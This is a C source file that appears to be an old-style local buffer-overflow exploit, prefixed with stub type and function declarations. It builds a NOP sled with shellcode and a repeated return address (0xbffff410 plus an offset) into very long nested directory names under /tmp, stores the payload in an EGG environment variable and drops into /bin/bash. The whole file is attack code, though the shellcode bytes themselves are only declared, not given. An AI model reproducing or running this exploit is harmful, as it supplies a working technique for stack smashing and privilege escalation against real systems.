
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int atoi (char*) ;
 int chdir (char*) ;
 int printf (char*,int) ;
 int setenv (char*,char*,int) ;
 char* shellcode ;
 char* shellpath ;
 char* shellprog ;
 int sprintf (char*,char*,char*) ;
 int strcpy (char*,char*) ;
 int strlen (char*) ;
 int system (char*) ;

main(int argc, char **argv) {
        char *p,*p2, path[4096], shell[4096], command[4096], old[4096];
        int i,len, offs;
        unsigned long addr=0xbffff410;

        if(argc>1) {
                offs=atoi(argv[1]);
        } else {
                offs=0;
        }
        chdir("/tmp");
        addr+=offs;
        printf("Using addr = 0x%08x\n", addr);


        p=path;
        for(i=0;i<162-strlen(shellcode);i++)
                *(p++)=(char)0x90;
        p2=shellcode;
        for(i=0;i<strlen(shellcode);i++)
                *(p++)=*(p2++);
        *p=0;
        strcpy(old, path);
        sprintf(command,"mkdir \"%s\"", path);
        system(command);


        for(i=0;i<strlen(shellpath);i++)
                *(p++)=shellpath[i];
        *p=0;
        sprintf(command,"mkdir \"%s\"", path);
        system(command);


        for(i=0;i<strlen(shellprog);i++)
                *(p++)=shellprog[i];
        *p=0;
        printf("strlen(path)=%d\n", strlen(path));
        sprintf(command,"mkdir \"%s\"", path);
        system(command);


        for(i=0;i<172;i++)
        {
                *(p++)=(char)(addr>>16)&0xff;
                *(p++)=(char)(addr>>24)&0xff;
                *(p++)=(char)addr&0xff;
                *(p++)=(char)(addr>>8)&0xff;
        }
        addr=(unsigned long)*(p-4);
        printf("ADDRESS: 0x%x\n", addr);
        *p=0;
        printf("strlen(path)=%d\n", strlen(path));
        sprintf(command,"mkdir \"%s\"", path);
        system(command);


        setenv("EGG",path,1);
        system("/bin/bash");
}
